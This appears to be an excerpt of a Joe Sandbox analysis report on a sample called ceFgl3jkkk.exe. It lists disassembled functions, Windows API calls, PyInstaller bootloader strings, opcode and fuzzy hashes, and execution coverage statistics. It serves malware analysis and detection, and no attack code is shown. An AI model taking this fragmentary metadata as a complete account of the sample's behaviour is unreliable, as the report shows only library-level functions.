                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncat_strncpy_strrchr
                                                                                                                      • String ID: SPLASH: Cannot extract requirement %s.$SPLASH: Cannot find requirement %s in archive.
                                                                                                                      • API String ID: 4078740465-4094522769
                                                                                                                      • Opcode ID: ae307b57f568946c5deeed348958dd275230ed6068620d6ec8b3b3f4e56f78a0
                                                                                                                      • Instruction ID: 2511db4ecb3df59b33a62026420ee0334ea4d0a9160cdb3665004b1fa753839f
                                                                                                                      • Opcode Fuzzy Hash: ae307b57f568946c5deeed348958dd275230ed6068620d6ec8b3b3f4e56f78a0
                                                                                                                      • Instruction Fuzzy Hash: 0851C472404340ABDB21DF54CC85ADF77ECAF85359F000519FE8997202D775A64DEBA2
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Cannot allocate memory for necessary files., xrefs: 00F550E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncpy
                                                                                                                      • String ID: Cannot allocate memory for necessary files.
                                                                                                                      • API String ID: 2961919466-2795144771
                                                                                                                      • Opcode ID: 335ec637f1ff5c98f8143b5c59d524eb9362e5c9af056ce788065d784e96144c
                                                                                                                      • Instruction ID: 3936028c1cdd2d8b150a77e956c7a3298e567c6c718c49ac081f34ed32a26dd4
                                                                                                                      • Opcode Fuzzy Hash: 335ec637f1ff5c98f8143b5c59d524eb9362e5c9af056ce788065d784e96144c
                                                                                                                      • Instruction Fuzzy Hash: 6241D4B2500205ABDB10DE68DC84EA63398BF44316F080975FF0CCB582D775E598A7B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                      • API String ID: 0-2340494698
                                                                                                                      • Opcode ID: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
                                                                                                                      • Instruction ID: 769c05011eb38cc9b8a535f25af5ba234d1ecafb8155463702d38078dff943d7
                                                                                                                      • Opcode Fuzzy Hash: 1ee21537f8899424de46d14492487d68d136b9319ad74834ea4bb9b305180722
                                                                                                                      • Instruction Fuzzy Hash: 46319171E00218EFCB21DF99CC819EEBBB8FF99310B144166E804E7211D7B59E44EBA0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID: TMP
                                                                                                                      • API String ID: 269201875-3125297090
                                                                                                                      • Opcode ID: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
                                                                                                                      • Instruction ID: fa3d2acf416d4f7a16f8131d253360dda85099e39a6b30d901fd219c02cec381
                                                                                                                      • Opcode Fuzzy Hash: 2b6dec763d7ffd3746eac685c2f9a38739514d2a48c56df694a6c88b8f74af37
                                                                                                                      • Instruction Fuzzy Hash: FD21937790420A6E5725AA1A9C83D7F73EDEAC277432D802AFC0A9B741EF74DD017261
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      Strings
                                                                                                                      • Failed to get executable path., xrefs: 00F534D6
                                                                                                                      • Failed to convert executable path to UTF-8., xrefs: 00F53517
                                                                                                                      • GetModuleFileNameW, xrefs: 00F534DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                      • API String ID: 2776309574-1977442011
                                                                                                                      • Opcode ID: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
                                                                                                                      • Instruction ID: 4b6baa833ee212b6c71ae0a493299a779dbd1518df30678c6390aaa1cfa8743d
                                                                                                                      • Opcode Fuzzy Hash: 7203b36ba09c081e13841837aa3e3abb5763877b420da7cbadbee37e8c27ccf3
                                                                                                                      • Instruction Fuzzy Hash: 6901DD757143006BF618A7249C8B7EB33C9AF54701F804455BF4DC2182F5AC9A0CE697
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3213747228-0
                                                                                                                      • Opcode ID: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
                                                                                                                      • Instruction ID: 623d3f7e87e38a1deec7359d066e732d88ff50c55bf4223ad5eb84214dfbaf4b
                                                                                                                      • Opcode Fuzzy Hash: 3e2da1a130bff8e067e98c8726f26c942e917486e4e2f1078dcd2f7c3124a5e2
                                                                                                                      • Instruction Fuzzy Hash: 90B13772D002859FDB11CF38C851BEEBBF5EF55354F2481AAE845EB242D6399D01EBA0
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F7014E
                                                                                                                      • _free.LIBCMT ref: 00F70177
                                                                                                                      • SetEndOfFile.KERNEL32(00000000,00F6E4B2,00000000,00F68438,?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000), ref: 00F701A9
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00F6E4B2,00F68438,00000000,?,?,?,?,00000000), ref: 00F701C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1547350101-0
                                                                                                                      • Opcode ID: 7139cca7aff077eef02f7aed4396b56b03c4382cfc5e347f77a0116eaec51539
                                                                                                                      • Instruction ID: 13ddb5071b192cfb74f8b1ca9e122d77cae321ad4dff42bc04ff47a7b393d20d
                                                                                                                      • Opcode Fuzzy Hash: 7139cca7aff077eef02f7aed4396b56b03c4382cfc5e347f77a0116eaec51539
                                                                                                                      • Instruction Fuzzy Hash: 8E412832900204EBDB15ABB8DC42B9E37B5EF443B0F644552F91CE72A1DEB8D954B722
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,00F5C84E,?,?,?,?,00F5C00A,?,?,?), ref: 00F66259
                                                                                                                      • _free.LIBCMT ref: 00F662B6
                                                                                                                      • _free.LIBCMT ref: 00F662EC
                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00F5C00A,?,?,?), ref: 00F662F7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2283115069-0
                                                                                                                      • Opcode ID: a55ae2014cfa04874ce23825ba001e4a069db79a32f60693468b2ee8f0c8e56c
                                                                                                                      • Instruction ID: 136cb0932026ed6828fda241b995760918b02c09c823bb6373c1d24061a6b29d
                                                                                                                      • Opcode Fuzzy Hash: a55ae2014cfa04874ce23825ba001e4a069db79a32f60693468b2ee8f0c8e56c
                                                                                                                      • Instruction Fuzzy Hash: F11182326046443ADF5137B89CD7E7B3A59DBC1778B340224F924C72E2DEB58D097220
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F663B0
                                                                                                                      • _free.LIBCMT ref: 00F6640D
                                                                                                                      • _free.LIBCMT ref: 00F66443
                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F6644E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2283115069-0
                                                                                                                      • Opcode ID: 51225b37bfae98ba5e6780cf1bd25e6a3a60b35b50ec3c0c9486a74a420bf827
                                                                                                                      • Instruction ID: ad61a686e0009904b778177c8fe733baf8bba1387840896059b781d75bd600b9
                                                                                                                      • Opcode Fuzzy Hash: 51225b37bfae98ba5e6780cf1bd25e6a3a60b35b50ec3c0c9486a74a420bf827
                                                                                                                      • Instruction Fuzzy Hash: F711A5326046147AD7117AB5AC87E7B3659DBC1774B240334F528D33E1DEB58C457311
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001), ref: 00F5F1E2
                                                                                                                      • GetLastError.KERNEL32(?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104), ref: 00F5F1EC
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5F1F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2398240785-0
                                                                                                                      • Opcode ID: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
                                                                                                                      • Instruction ID: ac1cbd61f767423f856330e0a65cf455ee27284160f5922c561c3f7546230a5b
                                                                                                                      • Opcode Fuzzy Hash: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
                                                                                                                      • Instruction Fuzzy Hash: E9F06D36A00115BBCB202FA2DC08D5AFF69EF457B270445A1FA19C6420D731E969FBD0
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00F5F179
                                                                                                                      • GetLastError.KERNEL32(?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104,?), ref: 00F5F183
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5F18A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2398240785-0
                                                                                                                      • Opcode ID: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
                                                                                                                      • Instruction ID: 86f8cb9fd64ca095aeac8cc7ba234300bac01f384a57444d162aadc13a297d2a
                                                                                                                      • Opcode Fuzzy Hash: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
                                                                                                                      • Instruction Fuzzy Hash: 88F06932A00915FBCB202BA2DC08D5ABF6AEF443A27154562FA1DC6420D731E968FBD0
                                                                                                                      APIs
                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000), ref: 00F6F67E
                                                                                                                      • GetLastError.KERNEL32(?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000,?,00F65711,?), ref: 00F6F68A
                                                                                                                        • Part of subcall function 00F6F650: CloseHandle.KERNEL32(FFFFFFFE,00F6F69A,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000), ref: 00F6F660
                                                                                                                      • ___initconout.LIBCMT ref: 00F6F69A
                                                                                                                        • Part of subcall function 00F6F612: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F6F641,00F6B4FB,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F625
                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F6AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2744216297-0
                                                                                                                      • Opcode ID: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
                                                                                                                      • Instruction ID: 44d623b026365f8bbcac9ade9d576851d5f63ffecef2259d229fc677b74173b4
                                                                                                                      • Opcode Fuzzy Hash: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
                                                                                                                      • Instruction Fuzzy Hash: EAF03937400128BBCF222F95ED099DA7F66FF197A0B404020FA0C96170CB338964BB91
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F62DD5
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F62DE8
                                                                                                                      • _free.LIBCMT ref: 00F62DF9
                                                                                                                      • _free.LIBCMT ref: 00F62E0A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
                                                                                                                      • Instruction ID: cbf15a8db23bfed0f43eb8ecd8a3a98e53ff0e54d82640f23c8a9c4b1b90513c
                                                                                                                      • Opcode Fuzzy Hash: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
                                                                                                                      • Instruction Fuzzy Hash: 57E0BF714001689E8711AF25FC028F63B75E7887207514027F414A2232C7B5165DFFD1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • pyi-, xrefs: 00F5438B
                                                                                                                      • Failed to convert Wflag %s using mbstowcs (invalid multibyte string), xrefs: 00F544DA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _mbstowcs
                                                                                                                      • String ID: Failed to convert Wflag %s using mbstowcs (invalid multibyte string)$pyi-
                                                                                                                      • API String ID: 686213805-3625900369
                                                                                                                      • Opcode ID: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
                                                                                                                      • Instruction ID: fa3554216c446def08ab37fcb0b8a6d9cd0deafa84d4ecbccc4e2728118b1d6d
                                                                                                                      • Opcode Fuzzy Hash: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
                                                                                                                      • Instruction Fuzzy Hash: 6341E8B69403006BD754EF64EC47F6637A8AB0031AF440950FF0497293EABDB55CB7A2

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:35.4%
                                                                                                                      Total number of Nodes:96
                                                                                                                      Total number of Limit Nodes:5
